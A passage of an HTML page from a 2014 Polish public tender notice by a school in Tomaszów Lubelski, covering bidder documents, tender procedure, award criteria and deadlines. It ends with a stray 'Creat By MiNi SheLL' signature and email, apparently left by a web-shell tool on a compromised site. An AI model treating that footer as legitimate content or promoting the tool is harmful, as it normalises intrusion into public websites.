zakresie wymaganym dla wykonawcy ( określonym w pkt.7) i oświadczenia o braku podstaw do wykluczenia z postępowania z powodu niespełnienia warunków, o których mowa w art. 24 ust.1 ustawy Pzp(wzór -zał. nr 7 do SIWZ). 7.1.9.Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby wykonawca powoływał się, na zasadach określonych w art. 26 ust.2b, w celu wykazania spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust.1, wykonawca jest obowiązany wykazać zamawiającemu, iż proponowany inny podwykonawca lub wykonawca samodzielnie spełnia je w stopniu nie mniejszym niz wymagany w trakcie postępowania o udzielenie zamówienia. 7.1.10. Inne dokumenty wymagane przez Zamawiającego: a) pełnomocnictwo osób podpisujących ofertę do podejmowania zobowiązań w imieniu Wykonawcy, o ile nie wynikają z przepisów prawa lub innych dokumentów.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.zsnr3.odt.pl/index.php?option=com_content&view=category&id=21&Itemid=20<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację istotnych warunków zamówienia można uzyskać pod adresem: 
Siedziba Zamawiajacego -Zespół Szkół Nr 3 w Tomaszowie Lubelskim ul. Hallera 5 , 22-600 Tomaszów Lubelski..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.08.2014 godzina 11:00, miejsce: Siedziba Zamawiającego  Zespół Szkół Nr 3 w Tomaszowie Lubelskim 
ul. Hallera 5 , 22-600 Tomaszów Lubelski ,  pok. nr 40- parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com